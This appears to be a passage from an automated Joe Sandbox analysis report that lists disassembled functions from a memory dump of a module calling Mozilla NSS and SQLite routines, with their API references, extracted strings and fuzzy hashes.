SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFF0CC4

Part of subcall function 6CFDFAB0: free.MOZGLUE(?,-00000001,?,?,6CF7F673,00000000,00000000), ref: 6CFDFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CFF0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CFF0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CFF0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CFF0D7D
free.MOZGLUE(00000000), ref: 6CFF0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFF0DC1
free.MOZGLUE(00000000), ref: 6CFF0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFF0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CFF0E0F

Part of subcall function 6CFC95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CFA7F4A,00000000,?,00000000,00000000), ref: 6CFC95E0
Part of subcall function 6CFC95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CFA7F4A,00000000,?,00000000,00000000), ref: 6CFC95F5
Part of subcall function 6CFC95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CFC9609
Part of subcall function 6CFC95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CFC961D
Part of subcall function 6CFC95C0: PK11_GetInternalSlot.NSS3 ref: 6CFC970B
Part of subcall function 6CFC95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CFC9756
Part of subcall function 6CFC95C0: PK11_GetIVLength.NSS3(?), ref: 6CFC9767
Part of subcall function 6CFC95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CFC977E
Part of subcall function 6CFC95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CFC978E

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID:
API String ID: 3136566230-0
Opcode ID: afcf84227b105531b6f4490a02e0a26a008f81c35c8fdc34f7c577341cdf6644
Instruction ID: fcda11ef598df64c2fa703fb01b5056f9a320b9291d47b6f4a598eac63339462
Opcode Fuzzy Hash: afcf84227b105531b6f4490a02e0a26a008f81c35c8fdc34f7c577341cdf6644
Instruction Fuzzy Hash: A241D1B1A00246ABEB009F64DC41BAF7678EF0430CF144024ED2567751EB75AA15CBF2

Function 6CF72D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6CF72D69

Strings

winSeekFile, xrefs: 6CF72E9C
winTruncate1, xrefs: 6CF72EBE
m, xrefs: 6CF72DD0
Pm, xrefs: 6CF72E74, 6CF72EC5, 6CF72F32, 6CF72F5C
winUnmapfile1, xrefs: 6CF72F55
winTruncate2, xrefs: 6CF72EF8
winUnmapfile2, xrefs: 6CF72F7F
@m, xrefs: 6CF72E24

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: __allrem
String ID: @m$Pm$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$m
API String ID: 2933888876-905258800
Opcode ID: e67c16d928347529e3e03f74cf2141b7f8ed9c8ca0766e0a6ee2b864dedeebd6
Instruction ID: f2ffb544c997c25cdecfa21197c470e28e6a0c69a7c6d848bf7fd9dcf4170173
Opcode Fuzzy Hash: e67c16d928347529e3e03f74cf2141b7f8ed9c8ca0766e0a6ee2b864dedeebd6
Instruction Fuzzy Hash: BD616F71A00205DFDB14CF68EC94BAE77B1FB49314F10852AE9599B790DB32E906CBA1

Function 6CF02400 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 125COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,bind on a busy prepared statement: [%s],?), ref: 6CF024EC
sqlite3_log.NSS3(00000015,API called with NULL prepared statement,?,?,?,?,?,6CF02315), ref: 6CF0254F
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000151C9,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,6CF02315), ref: 6CF0256C

Strings

bind on a busy prepared statement: [%s], xrefs: 6CF024E6
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CF024F4, 6CF02557
API called with NULL prepared statement, xrefs: 6CF0253C
API called with finalized prepared statement, xrefs: 6CF02543, 6CF0254D
misuse, xrefs: 6CF02561
%s at line %d of [%.10s], xrefs: 6CF02566

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
API String ID: 632333372-2222229625
Opcode ID: 492e8be7afc5857cdff4808daef99852d88e49b9eaa67ce1f2d0cc6a8cf62244
Instruction ID: 55674367b689b6b9cb6db34f1f66d12883e69c54588da2dc835da95bf10a06ca
Opcode Fuzzy Hash: 492e8be7afc5857cdff4808daef99852d88e49b9eaa67ce1f2d0cc6a8cf62244
Instruction Fuzzy Hash: 47413476B046009BE7148F19DCA8B7B77B6AF85B18F14052CE8094FB82DB37E905D7A1

Function 6CF86DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6CF87D8F,6CF87D8F,?,?), ref: 6CF86DC8

Part of subcall function 6CFDFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CFDFE08
Part of subcall function 6CFDFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CFDFE1D
Part of subcall function 6CFDFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CFDFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CF87D8F,?,?), ref: 6CF86DD5

Part of subcall function 6CFE10C0: TlsGetValue.KERNEL32(?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE10F3
Part of subcall function 6CFE10C0: EnterCriticalSection.KERNEL32(?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE110C
Part of subcall function 6CFE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE1141
Part of subcall function 6CFE10C0: PR_Unlock.NSS3(?,?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE1182
Part of subcall function 6CFE10C0: TlsGetValue.KERNEL32(?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D0A8FA0,00000000,?,?,?,?,6CF87D8F,?,?), ref: 6CF86DF7

Part of subcall function 6CFDB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D0B18D0,?), ref: 6CFDB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CF86E35

Part of subcall function 6CFDFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CFDFE29
Part of subcall function 6CFDFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CFDFE3D
Part of subcall function 6CFDFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CFDFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CF86E4C

Part of subcall function 6CFE10C0: PL_ArenaAllocate.NSS3(?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D0A8FE0,00000000), ref: 6CF86E82

Part of subcall function 6CF86AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CF8B21D,00000000,00000000,6CF8B219,?,6CF86BFB,00000000,?,00000000,00000000,?,?,?,6CF8B21D), ref: 6CF86B01
Part of subcall function 6CF86AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CF86B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CF86F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CF86F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D0A8FE0,00000000), ref: 6CF86F6B
PR_SetError.NSS3(FFFFE005,00000000,6CF87D8F,?,?), ref: 6CF86FE1

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: e3f3ee21e4cbea34b1698f130fc5de2a3f157db8e0975ae838385aab14151e60
Instruction ID: 2cf3c038d745b17dbaf053ea3cc38c29c60fa9ef7552cd61ccf8a59f5c36e581
Opcode Fuzzy Hash: e3f3ee21e4cbea34b1698f130fc5de2a3f157db8e0975ae838385aab14151e60
Instruction Fuzzy Hash: 26715071E216469BEB00CF55CD40BAAB7B5BF94348F194229F818DBB11F770EA94CB90

Function 6CFCADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAE10
EnterCriticalSection.KERNEL32(?,?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAE24
PR_Unlock.NSS3(?,?,?,?,?,?,6CFAD079,00000000,00000001), ref: 6CFCAE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAE6F
free.MOZGLUE(85145F8B,?,?,?,?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAE7F
TlsGetValue.KERNEL32(?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAEF1
free.MOZGLUE(6CFACDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CFACDBB,?), ref: 6CFCAF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAF30

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: f83e8cc83451043fc40d4dd0b06d7ce268fe3e6a3d2dbdbb19d942f5ce62a091
Instruction ID: 52c2ba559fa359e0c77b5d1b04acf6568e7c543771a1cfbce3105ac5929c5b1b
Opcode Fuzzy Hash: f83e8cc83451043fc40d4dd0b06d7ce268fe3e6a3d2dbdbb19d942f5ce62a091
Instruction Fuzzy Hash: DE5180B5B01A02AFDB01DF29D884B5AB7B4FF09318F144665ED1897A11E731F864CBD2

Function 6CFA4CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6CFAAB7F,?,00000000,?), ref: 6CFA4CB4
EnterCriticalSection.KERNEL32(0000001C,?,6CFAAB7F,?,00000000,?), ref: 6CFA4CC8
TlsGetValue.KERNEL32(?,6CFAAB7F,?,00000000,?), ref: 6CFA4CE0
EnterCriticalSection.KERNEL32(?,?,6CFAAB7F,?,00000000,?), ref: 6CFA4CF4
PL_HashTableLookup.NSS3(?,?,?,6CFAAB7F,?,00000000,?), ref: 6CFA4D03
PR_Unlock.NSS3(?,00000000,?), ref: 6CFA4D10

Part of subcall function 6D02DD70: TlsGetValue.KERNEL32 ref: 6D02DD8C
Part of subcall function 6D02DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D02DDB4

PR_Now.NSS3(?,00000000,?), ref: 6CFA4D26

Part of subcall function 6D049DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D090A27), ref: 6D049DC6
Part of subcall function 6D049DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D090A27), ref: 6D049DD1
Part of subcall function 6D049DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D049DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6CFA4D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CFA4DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CFA4E02

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 8210b4a06b7dded48e5d6d001ed52e68d9ea35d239091a4eff86d156c2cffa69
Instruction ID: 6cd24e3832032ad19fba7a202f5de0d51b579f84791d0642afacbfc1d218e1e2
Opcode Fuzzy Hash: 8210b4a06b7dded48e5d6d001ed52e68d9ea35d239091a4eff86d156c2cffa69
Instruction Fuzzy Hash: 044193B6900605AFEB019F68EC40B66BBB8BF05259F055171ED0887B12EF31D965C7E2

Function 6CF0CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CF0B999), ref: 6CF0CFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CF0B999), ref: 6CF0D02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6CF0B999), ref: 6CF0D041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CF0B999), ref: 6D05972B

Strings

database corruption, xrefs: 6CF0CFE7, 6CF0D013, 6CF0D028, 6CF0D039, 6CF0D03E, 6D059786
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CF0CFDD, 6CF0D00E, 6CF0D022, 6CF0D033, 6D059780
%s at line %d of [%.10s], xrefs: 6CF0CFEC, 6CF0D018, 6CF0D029, 6CF0D03F, 6D05978B

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 397eb12ea2f20a27519b04bc047af507255947d20217496e7f6200caa52a5a84
Instruction ID: bdc68d565777cadf36f1f70c0aa37518bf332e16cdbe5e12e6368794487996e3
Opcode Fuzzy Hash: 397eb12ea2f20a27519b04bc047af507255947d20217496e7f6200caa52a5a84
Instruction Fuzzy Hash: 06613871A042149BE310CF29C840BA7BBF5EF95718F28416EE8489B782D377D946C7A2

Function 6D00EF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6D02A4A1,?,00000000,?,00000001), ref: 6D00EF6D

Part of subcall function 6D02C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D02C2BF

htonl.WSOCK32(00000000,?,6D02A4A1,?,00000000,?,00000001), ref: 6D00EFE4
htonl.WSOCK32(?,00000000,?,6D02A4A1,?,00000000,?,00000001), ref: 6D00EFF1
memcpy.VCRUNTIME140(?,?,6D02A4A1,?,00000000,?,6D02A4A1,?,00000000,?,00000001), ref: 6D00F00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6D02A4A1,?,00000000,?,00000001), ref: 6D00F027

Strings

dtls13, xrefs: 6D00EF33

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: aed8c30955f691c2f14548a2b478e67b0ea4715b2ccc1035b0e8188f878506d6
Instruction ID: a2c9239393d5605879f7e79e742896f7f26e211d25cd9e45a4fed30eaa58e8e3
Opcode Fuzzy Hash: aed8c30955f691c2f14548a2b478e67b0ea4715b2ccc1035b0e8188f878506d6
Instruction Fuzzy Hash: E231E371A04215AFF710CF28DC80BAAB7E4BF49348F158029E918EB251E731ED11CBE5

Function 6CFBACC0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CFBACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFBAD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFBAD23

Part of subcall function 6D09D930: PL_strncpyz.NSS3(?,?,?), ref: 6D09D963

PR_LogPrint.NSS3(?,00000000), ref: 6CFBAD39

Strings

(CK_INVALID_HANDLE), xrefs: 6CFBAD1C
C_MessageDecryptFinal, xrefs: 6CFBACE1
hSession = 0x%x, xrefs: 6CFBACFE, 6CFBAD0E
nm, xrefs: 6CFBAD51, 6CFBAD7B

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$nm
API String ID: 332880674-3424258144
Opcode ID: ab7a90bcde173d8e61a7504d93fe5a0e7388bf6a44872e803ad57f753501842f
Instruction ID: 583305cb39cb70fdbdd722e5882aae788692f225444bace638d04919ad23aa06
Opcode Fuzzy Hash: ab7a90bcde173d8e61a7504d93fe5a0e7388bf6a44872e803ad57f753501842f
Instruction Fuzzy Hash: 5E2129315041089FEB14DB76DD84B6F37F5EB46B09F094025E909EB252DF309904CBA2

Function 6CFBA550 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageEncryptFinal), ref: 6CFBA576
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFBA5A4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFBA5B3

Part of subcall function 6D09D930: PL_strncpyz.NSS3(?,?,?), ref: 6D09D963

PR_LogPrint.NSS3(?,00000000), ref: 6CFBA5C9

Strings

C_MessageEncryptFinal, xrefs: 6CFBA571
(CK_INVALID_HANDLE), xrefs: 6CFBA5AC
hSession = 0x%x, xrefs: 6CFBA58E, 6CFBA59E
nm, xrefs: 6CFBA5E1, 6CFBA60B

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageEncryptFinal$nm
API String ID: 332880674-3861904214
Opcode ID: b13540af6f796886298002220e49c56df1d22e622052b8420342826d8590ccf7
Instruction ID: 6e346a307dd59b1ce9ddb1e0e0effbac8bebd552cfff66dd415b8ea0a67952eb
Opcode Fuzzy Hash: b13540af6f796886298002220e49c56df1d22e622052b8420342826d8590ccf7
Instruction Fuzzy Hash: 2D2129715051089FE7149B76DD88B6F37F5EB42B0CF040025E509EB642DF349A48CB92

Function 6CFCCC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6CFCCD08
PK11_DoesMechanism.NSS3(?,?), ref: 6CFCCE16
PR_SetError.NSS3(00000000,00000000), ref: 6CFCD079

Part of subcall function 6D02C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D02C2BF

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 3dda12b121a276f904041fb5c051749e96764343813c5ccd78ed7e3fb4de0907
Instruction ID: e39a189a4c47dfac6903fea6c60f5c8d6bc2301beda46e1c6b47f2f30b42bc35
